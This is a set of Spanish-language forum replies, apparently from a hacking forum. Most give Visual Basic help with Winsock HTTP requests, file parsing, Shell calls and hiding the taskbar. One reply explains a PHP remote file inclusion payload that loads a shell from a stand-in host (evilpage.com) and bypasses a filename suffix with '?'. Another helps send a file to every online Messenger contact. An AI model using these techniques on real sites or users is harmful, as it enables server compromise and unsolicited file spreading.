Mensajes

Hmm, probemos:

Código (vb) [Seleccionar] Expandir


Private Sub Form_Load()
Dim segViejo&, segNuevo&, Segundos As Byte
segViejo = Int(Timer)
segNuevo = 0
Ws.Connect "www.dequito.com", 80
Segundos = 0
Do
    If segViejo <> segNuevo Then
        segNuevo = segViejo
        Segundos = Segundos + 1
        If Segundos = 5 Then
            MsgBox "Imposible conectar"
            Exit Sub
        End If
    End If
    segViejo = Timer
    DoEvents
Loop Until Ws.State = sckConnected
MsgBox "Conectado con éxito"
End Sub

Lo que hace es un loop en el que comprueba si el estado del winsock es conectado, si es conectado muestra el mensaje de que se ha conectado con éxito, y si el estado no es conectado mientras se hace el bucle, comprueba si no han pasado mas de cinco segundos, lo puse arbitrario, porque creo que cinco segundos es mas o menos lo que debe tardar en realizarce la sola conexión, si te sale que es imposible conectarse, y con la página que diste quizas sea un error en una librería de código de tu compu, o reglas del firewall, en fin.
Si te conecta lo que queres decir es que no te está retornando el código html de la página. Para ello nos debemos fijar y seguir el protocolo:
GET /recurso HTTP/1.1
Host: www.dequito.com
Connection: Close

en visual:

Código (vb) [Seleccionar] Expandir


Private Sub Form_Load()
Dim segViejo&, segNuevo&, Segundos As Byte
Dim Request$
segViejo = Int(Timer)
segNuevo = 0
Ws.Connect "www.dequito.com", 80
Segundos = 0
Do
    If segViejo <> segNuevo Then
        segNuevo = segViejo
        Segundos = Segundos + 1
        If Segundos = 5 Then
            MsgBox "Imposible conectar"
            Exit Sub
        End If
    End If
    segViejo = Timer
    DoEvents
Loop Until Ws.State = sckConnected

Request = "GET /recurso HTTP/1.1" & vbCrLf & _
        "Host: www.dequito.com" & vbCrLf & _
        "Connection: Close" & vbCrLf & vbCrLf
Ws.SendData Request
End Sub

Todo el code y eso lo hice sin probar, así que puede que hayan errores, espero que no .
Mira haber si eso te sirve, sino es así, hace mucho publique acá un minimanual de este tipo de conexiones, quizas te sirva
Acá el link: http://foro.elhacker.net/index.php/topic,186798.0.html

Saludos

lo que hace el "?" es que se ejecute la shell o no?

No, lo que hace el "?", es separar la parte "real" de la parte "imaginaria"
Te explico más.
Tenes este código:

Código (php) [Seleccionar] Expandir


include $_GET['a'].'_template.php';

La inclusión normal sería:
...?a=http://evilpage.com/mishell.txt

Pero si haces esto así normal, te saldría un error porque en realidad estaría incluyendo el archivo
http://evilpage.com/mishell.txt_template.php

Para hacerle el escape a eso y no incluya el archivo "mishell.txt_template.php", se utiliza el "?" que me parece que también se llama porción de consulta, que es la que contiene las variables get en la petición.
En total quedaría:
...?a=http://evilpage.com/mishell.txt?
y el resto que se incluye es como si fuera una variable get
include('http://evilpage.com/mishell.txt?_template.php'); Siendo _template.php una variable

¿Si no has podido ejecutar scripts como sabes q es vulnerable a RFI? Prueba a ejecutar un script básico como:

Código [Seleccionar] Expandir


<?
echo "texto";
?>


Porque mira que warlock394 dijo: "pero no se ejecuta, simplemente muestra el codigo fuente de la shell"
Significa que no hay inclusión remota, que puede ser como dije mas arriba:

Código (php) [Seleccionar] Expandir


$pag = $_GET['pag_dest'];
$a = fopen($pag, "r");
echo fread($a,filesize($pag));
fclose($a);


modified.
y sorry por revivir el post pero no lo había visto, y me veía "obligado" a responder

saludos.

El que sí funciona:

Código (vb) [Seleccionar] Expandir


shell "explorer.exe http://www.elhacker.net"


Pero la forma mas bonita es la que posteo Chefito
saludos

modified: ups
start www.elhacker.net directamente con shell no funciona, pero Shell("cmd.exe /c start " & "http://elhacker.net") sí.
aunque hago una crítica constructiva, sería mejor Shell "cmd.exe /c start http://elhacker.net" da el mismo resultado, pero el procesador hace "menos" operaciones...

Fijate que hay dos paneles al ingresar, el de la izquiera es el panel del foro del respectivo reto, y el panel de la derecha son los retos en sí, tenes que empezar desde mas abajo, e ir ascendiendo. Me parece que el primer reto que tenes que hacer es firewall.

Saludos

Me equivoqué en vez de mandarte la respuesta la publiqué, pero la cambié a tiempo...

Y recuerden es -HadeS- no un tal HaDeS que quiere sacar crédito ajeno..

Que pasa pto, yo no he sacado crédito de nada, sos vos el que en un post dijiste que lo habías hecho fácil.
No necesito sacar crédito de nada, porque no lo necesito!

Modificado:
Ademas se nota que se te subió el ego, con eso de "recuerden que soy yo y no otro",  "el único que resolvió el reto fuí yo". Ve bajandote de esa nube en la que te montaste, porque desde lejos se nota que eres un pobre noob

...
la gente que no tiene ni la minima idea de php, usa las shells c99 y todas esas que te lo hacen casi todo automatico, pero no saben como funcionan.

$cmd es una variable global, con $_GET hacemos una peticion.
todo lo que pongamos despues del parametro cmd se ejecutara con system y nos mostrara el resultado del comando.
...

Se ve que no tenes la mínima idea de php, con $_GET no se hace ninguna petición, con $_GET se retornan los valores de una variable identificada por nombre x en el GET de una petición.

Código [Seleccionar] Expandir


GET /abc?a=123 HTTP/1.1
Host:...



Código (php) [Seleccionar] Expandir


$variable = $_GET['a'];
echo $variable


Respuesta: 123

Ademas él dice que se muestra el contenido del archivo, por lo que logicamente no se trata de una inclusión, sino de la lectura e impresión de datos como lo puse más arriba.

Si me respondias lo de "Explicame que hace exactamente el "?"
Saludos!, solo respondeme vos!"

Pues no respondiste lo que era.

Y de paso explico que es el ?
Lo que hay por delante del ? en las peticiones, es denominado porción de consulta, y es donde se encuentran las variables que se mandan al servidor. eso era todo, se utiliza el ? en las inclusiones, para que el sufijo que se le añade a la variable sea parte de la porción de consulta, y no sea incluido como un solo archivo.

Saludos

Si esa es toda la línea completa, intenta con esto a ver si te sale:

Código (vb) [Seleccionar] Expandir


Private Sub Form_Load()
Dim data As String
Dim vdata As Variant
Open "D:\Foros\SMF\Backup\localhost.sql" For Input As #1
data = Input$(LOF(1), #1)
Close #1

x = Split(data, vbCrLf)
For i = 0 To UBound(x)
    y = Split(x(i), ",")
    Text2.Text = Text2.Text & Replace(y(1), "'", "") & vbCrLf
Next i

End Sub

Conteste tarde, entonces creo que ya sacó todos los datos manualmente xD
saludos!

http://www.samair.ru

Nada más que decir x'D

A lo que se refiere lympex, es que al "List1.list" le tenes que pasar un parámetro que indica la posición del cursor sobre el listado, como no se puede agarrar todos los datos del list de una vez, tenes que hacer un bucle que recorra cada elemento de dicho list, así:

Código (vb) [Seleccionar] Expandir


dim i%
for i= 0 to list1.listcount
Window = FindWindow(vbNullString, List1.List(i))
'funciones para mandar el archivo
next i

Y dado que le vas a mandar a cada contacto el archivo, te sugiero mejor que no se lo mandes a todos los contactos conectado, sino que escojas del list1 algunos contactos solamente, y que a esos solo les mande el file.

Código (vb) [Seleccionar] Expandir


If (contacto.Status = 2) Or (contacto.Status = 10) Or (contacto.Status = 14) Or (contacto.Status = 34) Or (contacto.Status = 50) Or (contacto.Status = 66) Then

Esa línea, la podes cambiar por algo más simple:

Código (vb) [Seleccionar] Expandir


if contacto.status <> 1 then

Ya que 1 representa un contacto offline, si contacto.status devuelve un valor diferente a uno, es porque tiene los demás estados del messenger.

Saludos

Mira

Código (vb) [Seleccionar] Expandir


Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Dim hwnd_taskbar
Private Sub Command1_Click()
SetWindowPos hwnd_taskbar, 0, 0, 0, 0, 0, &H80
End Sub

Private Sub Command2_Click()
SetWindowPos hwnd_taskbar, 0, 0, 0, 0, 0, &H40
End Sub

Private Sub Form_Load()
hwnd_taskbar = FindWindow("Shell_traywnd", "")
End Sub

Utilizamos primero la api FindWindow para buscar el handle de la barra de inicio, que tiene por nombre "Shell_traywnd", luego de esto, utilizamos el api SetWindowPos para definir una posición de tal handle. El &H80 es para esconder, y el &H40 para mostrar.
Si queres que se oculte automáticamente cuando inicie el programa, pones el código dentro del form_load y listo.

Saludos;